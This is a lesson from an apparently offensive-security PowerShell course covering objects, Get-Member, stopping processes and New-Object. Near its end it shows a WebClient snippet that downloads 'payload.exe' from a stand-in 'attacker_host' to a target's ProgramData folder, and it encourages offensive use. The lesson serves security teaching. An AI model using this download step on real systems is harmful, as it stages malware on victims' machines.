Objects

Objects are essentially a representation of data that is provided as a result of running a cmdlet. Rather than with other scripting languages where data is output as text most of the time, PowerShell is different in that the data being output originates from classes within the .NET Framework in the form of “objects.”

Objects are partly comprised of collections of properties, along with “methods” that we can use to manipulate the objects.

Let’s take the Get-Process cmdlet as an example. When we run the Get-Process cmdlet along with the “Format-List *” command, as we’ve seen earlier, we get a list of all processes along with their properties.

If we take a look at the “firefox” process object for example, we can see it contains a number of different properties, (Name, Id, Path) to name a few.

Each of the objects also has multiple methods that we can use to manipulate a particular object. To get a list of methods for objects associated with a cmdlet, we can use the “Get-Member” cmdlet as part of a pipeline command, like the following:

PS C:\> Get-Process | Get-Member –MemberType Method

The “Get-Member” cmdlet will give us an idea of all of the methods for associated objects, as can be seen below for the “Get-Process” objects.

We can see from the previous output, that several methods that might be of interest to us for the “Get-Process” objects might be, “Kill,” or “Start,” which we could use to Kill, or Start processes.

So far:

1. We’ve identified an object (in this case, a process “firefox”) we’d
like to manipulate in some way using the “Get-Process” cmdlet.
2. We’ve determined the methods that are available for use with the
objects that were returned by using the “Get-Process | GetMember” cmdlet and pipeline.
3. And we’ve decided that the “Kill” method is the method we’d like
to use for that process (as an example).

The next step is straightforward. We can simply call the “Get-Process” cmdlet, along with the “-Name” parameter for the “firefox” process, and pipe that to the “Kill” method we identified using the “Get-Member” cmdlet. Our command would like the following:

PS C:\> Get-Process –Name “firefox” | Kill

Which effectively kills any Firefox processes.

This is just one example of how we can manipulate objects using their associated methods to help us meet our objectives.

In addition to using the built-in cmdlets to access a large number of objects, which we can then manipulate, we can also create .Net Objects which greatly extends our capabilities using the “NewObject” cmdlet.

We can use the “New-Object” cmdlet to create an instance of a .Net Framework object, or COM object.

These can be either created as a “Type” of the .NET Framework class, using fully qualified names of .NET classes, or, we can use the “ProgID” of a COM object.

As an example of creating a basic object based off of a .NET class with the “New-Object” cmdlet, we can use the “Net.WebClient” .NET system class to download a file to a target system with the following code:

PS C:\> $webclient = New-Object System.Net.WebClient
PS C:\> $payload_url = "https://attacker_host/payload.exe"
PS C:\> $file = “C:\ProgramData\payload.exe"
PS C:\> $webclient.DownloadFile($payload_url,$file)

In the example on the previous slide (line by line):

1. We create a variable called “$webclient” which instantiates the
“System.Net.WebClient” .NET class, which is used to create a web client.
2. We then create another variable ($payload_url), which is the url to our
payload.
3. The “$file” variable is then used as the location to which we want to save
the payload on the target system.
4. And finally, we call the $webclient” variable with the “DownloadFile”
method which downloads our payload.exe to the target.

We’ll see more examples of creating .NET and COM objects in the module that follows, but for now, experiment and research on ways you can use the “New-Object” cmdlet to create objects we can leverage for offensive purposes.

And this concludes our lesson on PowerShell fundamentals. Although we really only scratched the surface in regards to PowerShell fundamentals, we encourage you to explore its capabilities and apply those to your offensive work. In the next Module, we’ll be covering specific toolsets and even more useful things we can do with PowerShell for our purposes.